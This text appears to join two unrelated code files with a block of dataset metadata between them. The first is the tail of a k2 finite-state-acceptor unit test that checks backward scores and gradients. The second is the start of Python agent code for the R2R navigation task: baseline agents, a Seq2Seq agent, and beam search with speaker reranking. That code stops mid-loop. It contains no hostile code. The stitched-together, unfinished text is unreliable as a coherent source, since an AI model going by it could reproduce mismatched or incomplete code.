(expected_backward_scores[2] + scores[2]).exp() +
(expected_backward_scores[2] + scores[3]).exp() +
(expected_backward_scores[2] + scores[4]).exp()).log()
expected_backward_scores[0] = (
(expected_backward_scores[1] + scores[0]).exp() +
(expected_backward_scores[1] + scores[1]).exp()).log()
assert torch.allclose(backward_scores,
expected_backward_scores)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa.grad, scores.grad)
def test_simple_fsa_vec(self):
# combine case 1 and case 2
s1 = '''
0 1 1 0.0
0 1 2 0.1
0 2 3 2.2
1 2 4 0.5
1 2 5 0.6
1 3 -1 3.0
2 3 -1 0.8
3
'''
s2 = '''
0 1 1 0.1
0 1 2 0.2
1 2 3 0.3
1 2 4 0.4
1 2 5 0.5
2 3 6 0.6
2 3 7 0.7
3 4 -1 0.8
4
'''
devices = [torch.device('cpu')]
if torch.cuda.is_available():
devices.append(torch.device('cuda'))
for device in devices:
for use_double_scores in [True, False]:
fsa1 = k2.Fsa.from_str(s1).to(device).requires_grad_(True)
fsa2 = k2.Fsa.from_str(s2).to(device).requires_grad_(True)
fsa_vec = k2.create_fsa_vec([fsa1, fsa2])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=False)
scores1 = fsa1.scores.detach().clone().requires_grad_(True)
scores2 = fsa2.scores.detach().clone().requires_grad_(True)
expected_backward_scores1 = torch.empty_like(
backward_scores[:4])
expected_backward_scores2 = torch.empty_like(
backward_scores[4:])
expected_backward_scores1[3] = 0
# yapf:disable
expected_backward_scores1[2] = expected_backward_scores1[3] + scores1[6] # noqa
expected_backward_scores1[1] = expected_backward_scores1[3] + scores1[5] # noqa
expected_backward_scores1[0] = expected_backward_scores1[1] + scores1[1] # noqa
# yapf:enable
expected_backward_scores2[4] = 0
# yapf:disable
expected_backward_scores2[3] = expected_backward_scores2[4] + scores2[7] # noqa
expected_backward_scores2[2] = expected_backward_scores2[3] + scores2[6] # noqa
expected_backward_scores2[1] = expected_backward_scores2[2] + scores2[4] # noqa
expected_backward_scores2[0] = expected_backward_scores2[1] + scores2[1] # noqa
# yapf:enable
expected_backward_scores = torch.cat(
[expected_backward_scores1, expected_backward_scores2])
assert torch.allclose(backward_scores,
expected_backward_scores)
scale = torch.arange(backward_scores.numel()).to(device)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa1.grad, scores1.grad)
assert torch.allclose(fsa2.grad, scores2.grad)
# now for log semiring
fsa1.scores.grad = None
fsa2.scores.grad = None
fsa_vec = k2.create_fsa_vec([fsa1, fsa2])
backward_scores = fsa_vec.get_backward_scores(
use_double_scores=use_double_scores, log_semiring=True)
scores1 = fsa1.scores.detach().clone().requires_grad_(True)
scores2 = fsa2.scores.detach().clone().requires_grad_(True)
expected_backward_scores1 = torch.empty_like(
backward_scores[:4])
expected_backward_scores2 = torch.empty_like(
backward_scores[4:])
expected_backward_scores1[3] = 0
# yapf:disable
expected_backward_scores1[2] = expected_backward_scores1[3] + scores1[6] # noqa
# yapf:enable
expected_backward_scores1[1] = (
(expected_backward_scores1[2] + scores1[3]).exp() +
(expected_backward_scores1[2] + scores1[4]).exp() +
(expected_backward_scores1[3] + scores1[5]).exp()).log()
expected_backward_scores1[0] = (
(expected_backward_scores1[1] + scores1[0]).exp() +
(expected_backward_scores1[1] + scores1[1]).exp() +
(expected_backward_scores1[2] + scores1[2]).exp()).log()
expected_backward_scores2[4] = 0
# yapf:disable
expected_backward_scores2[3] = expected_backward_scores2[4] + scores2[7] # noqa
# yapf:enable
expected_backward_scores2[2] = (
(expected_backward_scores2[3] + scores2[5]).exp() +
(expected_backward_scores2[3] + scores2[6]).exp()).log()
expected_backward_scores2[1] = (
(expected_backward_scores2[2] + scores2[2]).exp() +
(expected_backward_scores2[2] + scores2[3]).exp() +
(expected_backward_scores2[2] + scores2[4]).exp()).log()
expected_backward_scores2[0] = (
(expected_backward_scores2[1] + scores2[0]).exp() +
(expected_backward_scores2[1] + scores2[1]).exp()).log()
expected_backward_scores = torch.cat(
[expected_backward_scores1, expected_backward_scores2])
assert torch.allclose(backward_scores,
expected_backward_scores)
(scale * backward_scores).sum().backward()
(scale * expected_backward_scores).sum().backward()
assert torch.allclose(fsa1.grad, scores1.grad)
assert torch.allclose(fsa2.grad, scores2.grad)
if __name__ == '__main__':
unittest.main()
| 46.291513
| 95
| 0.545397
| 1,379
| 12,545
| 4.68963
| 0.079043
| 0.262255
| 0.197309
| 0.038967
| 0.938766
| 0.916345
| 0.856812
| 0.831761
| 0.831761
| 0.740838
| 0
| 0.050259
| 0.35289
| 12,545
| 270
| 96
| 46.462963
| 0.746366
| 0.052371
| 0
| 0.746479
| 0
| 0
| 0.06647
| 0
| 0
| 0
| 0
| 0
| 0.065728
| 1
| 0.014085
| false
| 0
| 0.014085
| 0
| 0.032864
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c714657044a03b62453571e81027d911b705f819
| 151,322
|
py
|
Python
|
tasks/NDH/r2ragent.py
|
guhur/PREVALENT_R2R
|
c63ce840192c03338bc1e58ebac9e535de455dde
|
[
"MIT-0",
"MIT"
] | 5
|
2020-08-12T14:49:22.000Z
|
2022-02-13T21:48:30.000Z
|
tasks/NDH/r2ragent.py
|
guhur/PREVALENT_R2R
|
c63ce840192c03338bc1e58ebac9e535de455dde
|
[
"MIT-0",
"MIT"
] | 16
|
2020-07-26T08:28:56.000Z
|
2022-03-12T00:43:03.000Z
|
tasks/NDH/r2ragent.py
|
guhur/PREVALENT_R2R
|
c63ce840192c03338bc1e58ebac9e535de455dde
|
[
"MIT-0",
"MIT"
] | 4
|
2020-07-30T06:25:31.000Z
|
2021-03-03T10:08:35.000Z
|
''' Agents: stop/random/shortest/seq2seq '''
import json
import os
import sys
import numpy as np
import random
import time
import pickle
import torch
import torch.nn as nn
import torch.distributions as D
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import copy
from env import debug_beam
from utils import padding_idx, to_contiguous, clip_gradient
from agent_utils import basic_actions, sort_batch, teacher_action, discount_rewards, backchain_inference_states, path_element_from_observation, InferenceState, WorldState, least_common_viewpoint_path
from collections import Counter, defaultdict
import pdb
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
testing_settingA=False
# region Simple Agents
class BaseAgent(object):
''' Base class for an R2R agent to generate and save trajectories. '''
def __init__(self, env, results_path, seed=1):
self.env = env
self.results_path = results_path
if seed != 'resume': random.seed(seed)
self.results = {}
self.losses = [] # For learning agents
self.testing_settingA = False
def write_results(self, dump_file=False):
if '_' in list(self.results.keys())[0]:
#if testing_settingA:
if self.testing_settingA:
# choose one from three according to prob
for id in self.results:
bestp, best = self.results[id][1], self.results[id]
for ii in range(4):
temp_id = "%s_%d" % (id[:-2], ii)
if temp_id in self.results and self.results[temp_id][1] > bestp:
bestp = self.results[temp_id][1]
best = self.results[temp_id]
self.results[id] = best
output = [{'instr_id': k, 'trajectory': v[0]} for k, v in self.results.items()]
else:
output = [{'instr_id': k, 'trajectory': v} for k, v in self.results.items()]
else:
output = [{'instr_id':'%s_%d' % (k, i), 'trajectory': v} for k,v in self.results.items() for i in range(self.env.traj_n_sents[k])]
if dump_file:
with open(self.results_path, 'w') as f:
json.dump(output, f)
return output
def rollout(self, beam_size=1):
''' Return a list of dicts containing instr_id:'xx', path:[(viewpointId, heading_rad, elevation_rad)] '''
raise NotImplementedError
@staticmethod
def get_agent(name):
return globals()[name+"Agent"]
def test(self, beam_size=1, successors=1, speaker=(None,None,None,None)):
self.env.reset_epoch()
self.losses = []
self.results = {}
# We rely on env showing the entire batch before repeating anything
#print 'Testing %s' % self.__class__.__name__
speaker, speaker_weights, speaker_merge, evaluator = speaker
looped = False
batch_i, index_count = 0, [Counter() for _ in range(len(speaker_weights))] if speaker else []# for beam search
while True:
trajs = self.rollout(beam_size, successors)
if beam_size > 1 or debug_beam:
trajs, completed, traversed_list = trajs
for ti, traj in enumerate(trajs):
if (beam_size == 1 and debug_beam) or (beam_size>1 and speaker is None):
traj = traj[0]
elif beam_size>1 and (speaker is not None):#use speaker
traj = speaker_rank(speaker, speaker_weights, speaker_merge, traj, completed[ti], traversed_list[ti] if traversed_list else None, index_count)
else:
assert (beam_size == 1 and not debug_beam)
if traj['instr_id'] in self.results:
looped = True
else:
#if testing_settingA:
if self.testing_settingA:
self.results[traj['instr_id']] = (traj['path'], traj['prob']) # choose one from three according to prob
else:
self.results[traj['instr_id']] = traj['path']
if looped:
break
if beam_size>1: print('batch',batch_i)
batch_i+=1
# if use speaker, find best weight
if beam_size>1 and (speaker is not None): # speaker's multiple choices
best_sr, best_speaker_weight_i = -1, -1
for spi, speaker_weight in enumerate(speaker_weights):
if '_' in list(self.results.keys())[0]:
output = [{'instr_id': k, 'trajectory': v[spi]} for k, v in self.results.items()]
else:
output = [{'instr_id': '%s_%d' % (k, i), 'trajectory': v[spi]} for k, v in self.results.items() for i in
range(self.env.traj_n_sents[k])]
score_summary, _ = evaluator.score_output(output)
data_log = defaultdict(list)
for metric, val in score_summary.items():
data_log['%s %s' % (''.join(evaluator.splits), metric)].append(val)
print(index_count[spi])
print(speaker_weights[spi], '\n'.join([str((k, round(v[0], 4))) for k, v in sorted(data_log.items())]))
sr = score_summary['success_rate']
if sr>best_sr:
best_sr, best_speaker_weight_i = sr, spi
print('best sr:',best_sr,' speaker weight:',speaker_weights[best_speaker_weight_i])
print('best sr counter', index_count[best_speaker_weight_i])
self.results = {k: v[best_speaker_weight_i] for k, v in self.results.items()}
def speaker_rank(speaker, speaker_weights, speaker_merge, beam_candidates, this_completed, traversed_lists, index_count): # todo: this_completed is not sorted!! so not corresponding to beam_candidates
cand_obs, cand_actions, multi = [], [], isinstance(beam_candidates[0]['instr_encoding'], list)
cand_instr = [[] for _ in beam_candidates[0]['instr_encoding']] if multi else [] # else should be np.narray
for candidate in beam_candidates:
cand_obs.append(candidate['observations'])
cand_actions.append(candidate['actions'])
if multi:
for si, encoding in enumerate(candidate['instr_encoding']):
cand_instr[si].append(np.trim_zeros(encoding)[:-1])
else:
cand_instr.append(np.trim_zeros(candidate['instr_encoding'])[:-1])
if multi:
speaker_scored_candidates = [[] for _ in (beam_candidates)]
for si, sub_cand_instr in enumerate(cand_instr):
speaker_scored_candidates_si, _ = \
speaker._score_obs_actions_and_instructions(
cand_obs, cand_actions, sub_cand_instr, feedback='teacher')
for sc_i, sc in enumerate(speaker_scored_candidates_si):
speaker_scored_candidates[sc_i].append(sc)
else:
speaker_scored_candidates, _ = \
speaker._score_obs_actions_and_instructions(
cand_obs, cand_actions, cand_instr, feedback='teacher')
assert len(speaker_scored_candidates) == len(beam_candidates)
follower_scores = []
speaker_scores = []
score_merge = {'mean':np.mean,'max':np.max,'min':np.min}[speaker_merge]
for i, candidate in enumerate(beam_candidates): # different to speaker follower, our beam_candidates is not nested, we already got a subset from the outside of this function, so we do not need flatten it before enumerate
speaker_scored_candidate = speaker_scored_candidates[i]
if multi:
assert candidate['instr_id'] == speaker_scored_candidate[0]['instr_id']
candidate['speaker_score'] = score_merge([s['score'] for s in speaker_scored_candidate])
else:
assert candidate['instr_id'] == speaker_scored_candidate['instr_id']
candidate['speaker_score'] = speaker_scored_candidate['score']
candidate['follower_score'] = candidate['score']
del candidate['observations']
if traversed_lists:# physical_traversal:
last_traversed = traversed_lists[-1]
candidate_inf_state = \
this_completed[i]
path_from_last_to_next = least_common_viewpoint_path(
last_traversed, candidate_inf_state)
assert path_from_last_to_next[0].world_state.viewpointId \
== last_traversed.world_state.viewpointId
assert path_from_last_to_next[-1].world_state.viewpointId \
== candidate_inf_state.world_state.viewpointId
inf_traj = (traversed_lists +
path_from_last_to_next[1:])
physical_trajectory = [
path_element_from_observation(inf_state.observation)
for inf_state in inf_traj]
# make sure the viewpointIds match
assert (physical_trajectory[-1][0] ==
candidate['path'][-1][0])
candidate['path'] = physical_trajectory
follower_scores.append(candidate['follower_score'])
speaker_scores.append(candidate['speaker_score'])
speaker_std = np.std(speaker_scores)
follower_std = np.std(follower_scores)
instr_id = beam_candidates[0]['instr_id']
result_path = []
for spi, speaker_weight in enumerate(speaker_weights):
speaker_scaled_weight = float(speaker_weight) / speaker_std
follower_scaled_weight = (1 - float(speaker_weight)) / follower_std
best_ix, best_cand = max(
enumerate(beam_candidates),
key=lambda tp: (
tp[1]['speaker_score'] * speaker_scaled_weight +
tp[1]['follower_score'] * follower_scaled_weight))
result_path.append(best_cand['path'])
index_count[spi][best_ix] += 1
return {'instr_id': instr_id, 'path': result_path}
class StopAgent(BaseAgent):
''' An agent that doesn't move! '''
def rollout(self, beam_size=1):
world_states = self.env.reset()
obs = np.array(self.env._get_obs(world_states))
traj = [{
'instr_id': ob['instr_id'],
'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]
} for ob in obs]
return traj
class RandomAgent(BaseAgent):
''' An agent that picks a random direction then tries to go straight for
five viewpoint steps and then stops. '''
def __init__(self, env, results_path):
super(RandomAgent, self).__init__(env, results_path)
random.seed(1)
def rollout(self, beam_size=1):
world_states = self.env.reset()
obs = self.env._get_obs(world_states)
traj = [{
'instr_id': ob['instr_id'],
'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]
} for ob in obs]
self.steps = random.sample(list(range(-11,1)), len(obs))
ended = [False] * len(obs)
for t in range(30):
actions = []
for i,ob in enumerate(obs):
if self.steps[i] >= 5:
actions.append((0, 0, 0)) # do nothing, i.e. end
ended[i] = True
elif self.steps[i] < 0:
actions.append((0, 1, 0)) # turn right (direction choosing)
self.steps[i] += 1
elif len(ob['navigableLocations']) > 1:
actions.append((1, 0, 0)) # go forward
self.steps[i] += 1
else:
actions.append((0, 1, 0)) # turn right until we can go forward
obs = self.env._get_obs(self.env.step(actions))
for i,ob in enumerate(obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
return traj
class ShortestAgent(BaseAgent):
''' An agent that always takes the shortest path to goal. '''
def rollout(self, beam_size=1):
world_states = self.env.reset()
obs = np.array(self.env._get_obs(world_states))
traj = [{
'instr_id': ob['instr_id'],
'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]
} for ob in obs]
ended = np.array([False] * len(obs))
while True:
actions = [ob['teacher'] for ob in obs]
obs = self.env._get_obs(self.env.step(actions))
for i,a in enumerate(actions):
if a == (0, 0, 0):
ended[i] = True
for i,ob in enumerate(obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
if ended.all():
break
return traj
class ShortestCollectAgent(BaseAgent):
''' An agent that always takes the shortest path to goal. '''
def __init__(self, env, results_path, max_episode_len, name=""):
super(ShortestCollectAgent, self).__init__(env, results_path)
self.episode_len = max_episode_len
self.name = name
def collect(self):
idx = 0
total_traj = len(self.env.data)
data = list()
while len(data) < total_traj:
traj = self.rollout()
data.extend(traj)
print("you collected %d shortest paths" % (len(data)))
file_name = "/shortest_{}.json".format(self.name)
with open(self.results_path + file_name, 'w+') as f:
json.dump(data, f)
def rollout(self, beam_size=1):
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
traj = [{
'instr_id': ob['instr_id'],
'path': [(ob['scan'], ob['viewpoint'], ob['viewIndex'],ob['heading'], ob['elevation'])],
'teacher_actions':[],
'teacher_action_emd':[],
'instr_encoding':ob['instr_encoding'].tolist()
} for ob in obs]
ended = np.array([False] * len(obs))
#while True:
for t in range(self.episode_len):
actions = [ob['teacher'] for ob in obs]
for i,a in enumerate(actions):
if not ended[i]:
traj[i]['teacher_actions'].append(a)
if a == 0:
traj[i]['teacher_action_emd'].append((-1,90,90))
else:
traj[i]['teacher_action_emd'].append((obs[i]['adj_loc_list'][a]['absViewIndex'], obs[i]['adj_loc_list'][a]['rel_heading'],obs[i]['adj_loc_list'][a]['rel_elevation']))
obs = self.env._get_obs(self.env.step(actions, obs))
for i,a in enumerate(actions):
if a == (0, 0, 0) or a == 0:
ended[i] = True
for i,ob in enumerate(obs):
if not ended[i]:
traj[i]['path'].append((ob['scan'], ob['viewpoint'], ob['viewIndex'],ob['heading'], ob['elevation']))
if ended.all():
break
return traj
# endregion
class Seq2SeqAgent(BaseAgent):
''' An agent based on an LSTM seq2seq model with attention. '''
model_actions, env_actions = basic_actions()
feedback_options = ['teacher', 'argmax', 'sample']
def __init__(self, env, results_path, encoder, decoder, seed, aux_ratio, decoder_init,
params=None, monotonic=False, episode_len=20, state_factored=False, accu_n_iters = 0): # , subgoal
super(Seq2SeqAgent, self).__init__(env, results_path, seed=seed)
self.encoder, self.decoder = encoder, decoder # encoder2 is only for self_critic
self.encoder2, self.decoder2 = None, None
self.monotonic = monotonic
if self.monotonic:
self.copy_seq2seq()
self.episode_len = episode_len
self.losses = []
self.losses_ctrl_f = [] # For learning auxiliary tasks
self.aux_ratio = aux_ratio
self.decoder_init = decoder_init
self.clip_gradient = params['clip_gradient']
self.clip_gradient_norm = params['clip_gradient_norm']
self.reward_func = params['reward_func']
self.schedule_ratio = params['schedule_ratio']
self.temp_alpha = params['temp_alpha']
self.testing_settingA = params['test_A']
if self.decoder.action_space == 6:
self.ignore_index = self.model_actions.index('<ignore>')
else:
self.ignore_index = -1
self.criterion = nn.CrossEntropyLoss(ignore_index=self.ignore_index)
if self.decoder.ctrl_feature:
assert self.decoder.action_space == -1 # currently only implement this
self.criterion_ctrl_f = nn.MSELoss() # todo: MSE or ?
self.state_factored = state_factored
self.accu_n_iters = accu_n_iters
@staticmethod
def n_inputs():
return len(Seq2SeqAgent.model_actions)
@staticmethod
def n_outputs():
return len(Seq2SeqAgent.model_actions)-2 # Model doesn't output start or ignore
def _sort_batch(self, obs):
sorted_tensor, mask, seq_lengths, perm_idx = sort_batch(obs)
if isinstance(sorted_tensor, list):
sorted_tensors, masks, seqs_lengths = [], [], []
for i in range(len(sorted_tensor)):
sorted_tensors.append(Variable(sorted_tensor[i], requires_grad=False).long().to(device))
masks.append(mask[i].byte().to(device))
seqs_lengths.append(seq_lengths[i])
return sorted_tensors, masks, seqs_lengths, perm_idx
return Variable(sorted_tensor, requires_grad=False).long().to(device), \
mask.byte().to(device), \
list(seq_lengths), list(perm_idx)
def _feature_variable(self, obs):
''' Extract precomputed features into variable. '''
#feature_size = obs[0]['feature'].shape[0]
#features = np.empty((len(obs),feature_size), dtype=np.float32)
if isinstance(obs[0]['feature'],tuple): # todo?
features_pano = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'][0], dtype=np.float32), 0), len(obs), axis=0) # jolin
features = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'][1], dtype=np.float32), 0), len(obs), axis=0) # jolin
for i,ob in enumerate(obs):
features_pano[i] = ob['feature'][0]
features[i] = ob['feature'][1]
return (Variable(torch.from_numpy(features_pano), requires_grad=False).to(device),
Variable(torch.from_numpy(features), requires_grad=False).to(device))
else:
features = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'], dtype=np.float32),0),len(obs),axis=0) # jolin
for i,ob in enumerate(obs):
features[i] = ob['feature']
return Variable(torch.from_numpy(features), requires_grad=False).to(device)
def get_next(self, feedback, target, logit):
if feedback == 'teacher':
a_t = target # teacher forcing
elif feedback == 'argmax':
_, a_t = logit.max(1) # student forcing - argmax
a_t = a_t.detach()
elif feedback == 'sample':
probs = F.softmax(logit, dim=1)
m = D.Categorical(probs)
a_t = m.sample() # sampling an action from model
else:
sys.exit('Invalid feedback option')
return a_t
def _action_variable(self, obs):
# get the maximum number of actions of all sample in this batch
max_num_a = -1
for i, ob in enumerate(obs):
max_num_a = max(max_num_a, len(ob['adj_loc_list']))
is_valid = np.zeros((len(obs), max_num_a), np.float32)
action_embedding_dim = obs[0]['action_embedding'].shape[-1]
action_embeddings = np.zeros((len(obs), max_num_a, action_embedding_dim), dtype=np.float32)
for i, ob in enumerate(obs):
adj_loc_list = ob['adj_loc_list']
num_a = len(adj_loc_list)
is_valid[i, 0:num_a] = 1.
action_embeddings[i, :num_a, :] = ob['action_embedding'] #bug: todo
#for n_a, adj_dict in enumerate(adj_loc_list):
# action_embeddings[i, :num_a, :] = ob['action_embedding']
return (Variable(torch.from_numpy(action_embeddings), requires_grad=False).to(device),
Variable(torch.from_numpy(is_valid), requires_grad=False).to(device),
is_valid)
def _teacher_action_variable(self, obs):
# get the maximum number of actions of all sample in this batch
action_embedding_dim = obs[0]['action_embedding'].shape[-1]
action_embeddings = np.zeros((len(obs), action_embedding_dim), dtype=np.float32)
for i, ob in enumerate(obs):
adj_loc_list = ob['adj_loc_list']
action_embeddings[i, :] = ob['action_embedding'][ob['teacher']] #bug: todo
#for n_a, adj_dict in enumerate(adj_loc_list):
# action_embeddings[i, :num_a, :] = ob['action_embedding']
return Variable(torch.from_numpy(action_embeddings), requires_grad=False).to(device)
def _teacher_action(self, obs, ended):
a = teacher_action(self.model_actions, self.decoder.action_space, obs, ended, self.ignore_index)
return Variable(a, requires_grad=False).to(device)
def _teacher_feature(self, obs, ended):#, max_num_a):
''' Extract teacher look ahead auxiliary features into variable. '''
# todo: 6 action space
ctrl_features_dim = -1
for i, ob in enumerate(obs): # todo: whether include <stop> ?
# max_num_a = max(max_num_a, len(ob['ctrl_features']))
if ctrl_features_dim<0 and len(ob['ctrl_features']):
ctrl_features_dim = ob['ctrl_features'].shape[-1] #[0].shape[-1]
break
#is_valid no need to create. already created
ctrl_features_tensor = np.zeros((len(obs), ctrl_features_dim), dtype=np.float32)
for i, ob in enumerate(obs):
if not ended[i]:
ctrl_features_tensor[i, :] = ob['ctrl_features']
return Variable(torch.from_numpy(ctrl_features_tensor), requires_grad=False).to(device)
def rollout(self, beam_size=1, successors=1):
if beam_size ==1 and not debug_beam:
if self.encoder.__class__.__name__ in ['BertImgEncoder','MultiVilBertEncoder','BertAddEncoder','MultiVilAddEncoder','MultiAddLoadEncoder', 'HugAddEncoder','MultiHugAddEncoder']:
return self.bert_rollout_with_loss()
elif self.encoder.__class__.__name__ in ['BertLangEncoder']:
return self.langbert_rollout_with_loss()
else:
return self.rollout_with_loss()
# beam
with torch.no_grad():
if self.state_factored:
beams = self.state_factored_search(beam_size, successors, first_n_ws_key=4)
else:
beams = self.beam_search(beam_size)
return beams
def state_factored_search(self, completion_size, successor_size, first_n_ws_key=4):
assert self.decoder.panoramic
world_states = self.env.reset(sort=True)
initial_obs = (self.env._get_obs(world_states))
batch_size = len(world_states)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch([o for ob in initial_obs for o in ob])
world_states = [[world_state for f, world_state in states] for states in world_states]
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
completed = []
completed_holding = []
for _ in range(batch_size):
completed.append({})
completed_holding.append({})
state_cache = [
{ws[0][0:first_n_ws_key]: (InferenceState(prev_inference_state=None,
world_state=ws[0],
observation=o[0],
flat_index=None,
last_action=-1,
last_action_embedding=self.decoder.u_begin,
action_count=0,
score=0.0, h_t=h_t[i], c_t=c_t[i], last_alpha=None), True)}
for i, (ws, o) in enumerate(zip(world_states, initial_obs))
]
beams = [[inf_state for world_state, (inf_state, expanded) in sorted(instance_cache.items())]
for instance_cache in state_cache] # sorting is a noop here since each instance_cache should only contain one
last_expanded_list = []
traversed_lists = []
for beam in beams:
assert len(beam)==1
first_state = beam[0]
last_expanded_list.append(first_state)
traversed_lists.append([first_state])
def update_traversed_lists(new_visited_inf_states):
assert len(new_visited_inf_states) == len(last_expanded_list)
assert len(new_visited_inf_states) == len(traversed_lists)
for instance_index, instance_states in enumerate(new_visited_inf_states):
last_expanded = last_expanded_list[instance_index]
# todo: if this passes, shouldn't need traversed_lists
assert last_expanded.world_state.viewpointId == traversed_lists[instance_index][-1].world_state.viewpointId
for inf_state in instance_states:
path_from_last_to_next = least_common_viewpoint_path(last_expanded, inf_state)
# path_from_last should include last_expanded's world state as the first element, so check and drop that
assert path_from_last_to_next[0].world_state.viewpointId == last_expanded.world_state.viewpointId
assert path_from_last_to_next[-1].world_state.viewpointId == inf_state.world_state.viewpointId
traversed_lists[instance_index].extend(path_from_last_to_next[1:])
last_expanded = inf_state
last_expanded_list[instance_index] = last_expanded
# Do a sequence rollout and calculate the loss
while any(len(comp) < completion_size for comp in completed):
beam_indices = []
u_t_list = []
h_t_list = []
c_t_list = []
flat_obs = []
for beam_index, beam in enumerate(beams):
for inf_state in beam:
beam_indices.append(beam_index)
u_t_list.append(inf_state.last_action_embedding)
h_t_list.append(inf_state.h_t.unsqueeze(0))
c_t_list.append(inf_state.c_t.unsqueeze(0))
flat_obs.append(inf_state.observation)
u_t_prev = torch.stack(u_t_list, dim=0)
assert len(u_t_prev.shape) == 2
# Image features from obs
# if self.decoder.panoramic:
f_t_all, f_t = self._feature_variable(flat_obs)
# Action feature from obs
# if self.decoder.action_space == 6:
# u_t_features, is_valid = np.zeros((batch_size, 1)), None
# else:
u_t_features, is_valid, is_valid_numpy = self._action_variable(flat_obs)
h_t = torch.cat(h_t_list, dim=0)
c_t = torch.cat(c_t_list, dim=0)
h_t, c_t, alpha, logit, pred_f = self.decoder(None, u_t_prev, u_t_features, f_t,
f_t_all, h_t, c_t, [ctx_si[beam_indices] for ctx_si in ctx] if isinstance(ctx, list) else ctx[beam_indices],
[seq_mask_si[beam_indices] for seq_mask_si in seq_mask] if isinstance(ctx, list) else seq_mask[beam_indices])
# Mask outputs of invalid actions
logit[is_valid == 0] = -float('inf')
# # Mask outputs where agent can't move forward
# no_forward_mask = [len(ob['navigableLocations']) <= 1 for ob in flat_obs]
masked_logit = logit
log_probs = F.log_softmax(logit, dim=1).data
# force ending if we've reached the max time steps
# if t == self.episode_len - 1:
# action_scores = log_probs[:,self.end_index].unsqueeze(-1)
# action_indices = torch.from_numpy(np.full((log_probs.size()[0], 1), self.end_index))
# else:
#_, action_indices = masked_logit.data.topk(min(successor_size, logit.size()[1]), dim=1)
_, action_indices = masked_logit.data.topk(logit.size()[1], dim=1) # todo: fix this
action_scores = log_probs.gather(1, action_indices)
assert action_scores.size() == action_indices.size()
start_index = 0
assert len(beams) == len(world_states)
all_successors = []
for beam_index, (beam, beam_world_states) in enumerate(zip(beams, world_states)):
successors = []
end_index = start_index + len(beam)
assert len(beam_world_states) == len(beam)
if beam:
for inf_index, (inf_state, world_state, action_score_row) in \
enumerate(zip(beam, beam_world_states, log_probs[start_index:end_index])):
flat_index = start_index + inf_index
for action_index, action_score in enumerate(action_score_row):
if is_valid_numpy[flat_index, action_index] == 0:
continue
successors.append(
InferenceState(prev_inference_state=inf_state, world_state=world_state,
observation=flat_obs[flat_index],
flat_index=None,
last_action=action_index,
last_action_embedding=u_t_features[flat_index, action_index].detach(),
action_count=inf_state.action_count + 1,
score=float(inf_state.score + action_score),
h_t=h_t[flat_index], c_t=c_t[flat_index],
last_alpha=[alpha_si[flat_index].data for alpha_si in alpha] if isinstance(alpha, list) else alpha[flat_index].data)
)
start_index = end_index
successors = sorted(successors, key=lambda t: t.score, reverse=True)
all_successors.append(successors)
successor_world_states = [
[inf_state.world_state for inf_state in successors]
for successors in all_successors
]
successor_env_actions = [
[inf_state.last_action for inf_state in successors]
for successors in all_successors
]
successor_last_obs = [
[inf_state.observation for inf_state in successors]
for successors in all_successors
]
successor_world_states = self.env.step(successor_env_actions, successor_last_obs, successor_world_states)
successor_world_states = [[world_state for f, world_state in states] for states in successor_world_states]
acc = []
for ttt in zip(all_successors, successor_world_states):
mapped = [inf._replace(world_state=ws) for inf, ws in zip(*ttt)]
acc.append(mapped)
all_successors = acc
assert len(all_successors) == len(state_cache)
new_beams = []
for beam_index, (successors, instance_cache) in enumerate(zip(all_successors, state_cache)):
# early stop if we've already built a sizable completion list
instance_completed = completed[beam_index]
instance_completed_holding = completed_holding[beam_index]
if len(instance_completed) >= completion_size:
new_beams.append([])
continue
for successor in successors:
ws_keys = successor.world_state[0:first_n_ws_key]
if successor.last_action == 0 or successor.action_count == self.episode_len:
if ws_keys not in instance_completed_holding or instance_completed_holding[ws_keys][
0].score < successor.score:
instance_completed_holding[ws_keys] = (successor, False)
else:
if ws_keys not in instance_cache or instance_cache[ws_keys][0].score < successor.score:
instance_cache[ws_keys] = (successor, False)
# third value: did this come from completed_holding?
uncompleted_to_consider = ((ws_keys, inf_state, False) for (ws_keys, (inf_state, expanded)) in
instance_cache.items() if not expanded)
completed_to_consider = ((ws_keys, inf_state, True) for (ws_keys, (inf_state, expanded)) in
instance_completed_holding.items() if not expanded)
import itertools
import heapq
to_consider = itertools.chain(uncompleted_to_consider, completed_to_consider)
ws_keys_and_inf_states = heapq.nlargest(successor_size, to_consider, key=lambda pair: pair[1].score)
new_beam = []
for ws_keys, inf_state, is_completed in ws_keys_and_inf_states:
if is_completed:
assert instance_completed_holding[ws_keys] == (inf_state, False)
instance_completed_holding[ws_keys] = (inf_state, True)
if ws_keys not in instance_completed or instance_completed[ws_keys].score < inf_state.score:
instance_completed[ws_keys] = inf_state
else:
instance_cache[ws_keys] = (inf_state, True)
new_beam.append(inf_state)
if len(instance_completed) >= completion_size:
new_beams.append([])
else:
new_beams.append(new_beam)
beams = new_beams
# Early exit if all ended
if not any(beam for beam in beams):
break
world_states = [
[inf_state.world_state for inf_state in beam]
for beam in beams
]
successor_obs = np.array(self.env._get_obs(self.env.world_states2feature_states(world_states)))
acc = []
for tttt in zip(beams, successor_obs):
